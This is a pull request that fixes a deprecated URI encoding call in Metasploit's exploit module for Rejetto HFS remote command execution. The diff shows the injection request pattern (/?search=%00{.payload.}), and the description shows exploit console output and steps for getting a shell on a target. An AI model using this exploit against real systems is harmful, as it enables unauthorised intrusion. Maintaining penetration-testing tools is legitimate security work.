### PR TITLE
Change depreciated URI::encode call to URI::encode_www_form_component within rejetto_hfs_exec

### DIFF
--- a/modules/exploits/windows/http/rejetto_hfs_exec.rb
+++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     payloads.each do |payload|
       send_request_raw({
         'method' => 'GET',
-        'uri'    => "/?search=%00{.#{URI::encode(payload)}.}"
+        'uri' => "/?search=%00{.#{URI::encode_www_form_component(payload)}.}"
       })
     end
     register_file_for_cleanup(vbs_path)


### PR DESCRIPTION
Fix #13973 :
The current code results in the following error :
```
[*] Started reverse TCP handler on 192.168.1.105:4444 
[*] Using URL: http://0.0.0.0:8080/o6wYorU
[*] Local IP: http://192.168.1.105:8080/o6wYorU
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\jsywNguEzNXZF.vbs' on the target
[*] Exploit completed, but no session was created.
```

This minor edit should fix it.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/http/rejetto_hfs_exec`
- [x] `set RHOISTS *target IP*`
- [x] `exploit`
- [x] **Verify** that one can still get a shell on the target with various different payloads.
- [x] **Verify** that no `URI.escape is obsolete` error messages occur.
- [x] **Document** any issues encountered.
